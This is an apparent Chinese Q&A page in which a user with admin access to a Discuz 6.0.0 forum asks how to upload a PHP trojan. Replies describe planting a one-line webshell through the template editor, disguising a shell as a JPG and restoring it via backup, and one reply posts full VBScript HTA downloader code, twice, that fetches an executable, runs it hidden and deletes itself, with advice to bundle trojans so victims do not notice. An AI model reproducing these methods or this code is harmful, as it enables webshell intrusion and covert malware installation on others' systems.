discuz 6.0.0 怎么样上传木马
拿到后台权限可以登陆后台了,怎么样才能上传个PHP的木马呢?嘿嘿,我检查我自己论坛的安全漏洞。新手,不要笑俺!我已经直接上传PHP的文件了,可是找不到路径。无法在前台打开...
拿到后台权限可以登陆后台了,怎么样才能上传个PHP的木马呢?
嘿嘿,我检查我自己论坛的安全漏洞。新手,不要笑俺!
我已经直接上传PHP的文件了,可是找不到路径。无法在前台打开。
后台管理里面显示的是 怎么样找到实际路径?bbs/attachments/month_0810/20081006_763e18df4ba02425a3d6f4ETASYcx5e4.attach 展开
嘿嘿,我检查我自己论坛的安全漏洞。新手,不要笑俺!
我已经直接上传PHP的文件了,可是找不到路径。无法在前台打开。
后台管理里面显示的是 怎么样找到实际路径?bbs/attachments/month_0810/20081006_763e18df4ba02425a3d6f4ETASYcx5e4.attach 展开
8个回答
展开全部
哎,又要教坏孩子了,虽然我也是啊,呵呵,告诉你把,在discuz的后台有个模板编辑,在里面写入php的一句话小马,之后访问那个文件,(就是修改模板里面的那个文件)进了小马之后再传大马,最近一定要把改的那个文件在模板编辑里改回去的,不然的话别人一访问就看到你的小马了啊
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
AiPPT
2024-09-19 广告
随着AI技术的飞速发展,如今市面上涌现了许多实用易操作的AI生成工具1、简介:AiPPT: 这款AI工具智能理解用户输入的主题,提供“AI智能生成”和“导入本地大纲”的选项,生成的PPT内容丰富多样,可自由编辑和添加元素,图表类型包括柱状图...
点击进入详情页
本回答由AiPPT提供
展开全部
试试备份系统,看看能不能传,
把马改成jpg模式,上传了,
然后备份,就能还原成php,
我已经好久没搞了,不知道这个方法还行不行,
把马改成jpg模式,上传了,
然后备份,就能还原成php,
我已经好久没搞了,不知道这个方法还行不行,
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
一。名字为abc.abc的文件
<html>
<script language="vbscript">
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
HttpDoGet=oReq.respomseBody
Savefile HttpDoGet,"c:\win.exe"
End If
Set oReq=nothing
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type =1
objStream.Open
objStream.write str
objStream.SaveToFile fName.2
objStream.Close()
set objStream = nothing
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:\win.exe",0)
b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>
打开一个文本文档,把代码上上去存储就可以了,常见的四种代码我都有,看你需要什么了。上去了就直接存,或者通windows自带的木马捆绑器进行木马捆绑 对方不易发现~~~路径就不用找了,你要找到的话说一声,看你需要什么了!
<html>
<script language="vbscript">
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
HttpDoGet=oReq.respomseBody
Savefile HttpDoGet,"c:\win.exe"
End If
Set oReq=nothing
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type =1
objStream.Open
objStream.write str
objStream.SaveToFile fName.2
objStream.Close()
set objStream = nothing
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:\win.exe",0)
b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>
打开一个文本文档,把代码上上去存储就可以了,常见的四种代码我都有,看你需要什么了。上去了就直接存,或者通windows自带的木马捆绑器进行木马捆绑 对方不易发现~~~路径就不用找了,你要找到的话说一声,看你需要什么了!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
一般是做jpg文件模式啦.
上传成功的时候注意下地址栏变化.
其实,有时候多试几次......也会行
上传成功的时候注意下地址栏变化.
其实,有时候多试几次......也会行
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
兄弟,出来混早晚要还得!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(6)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
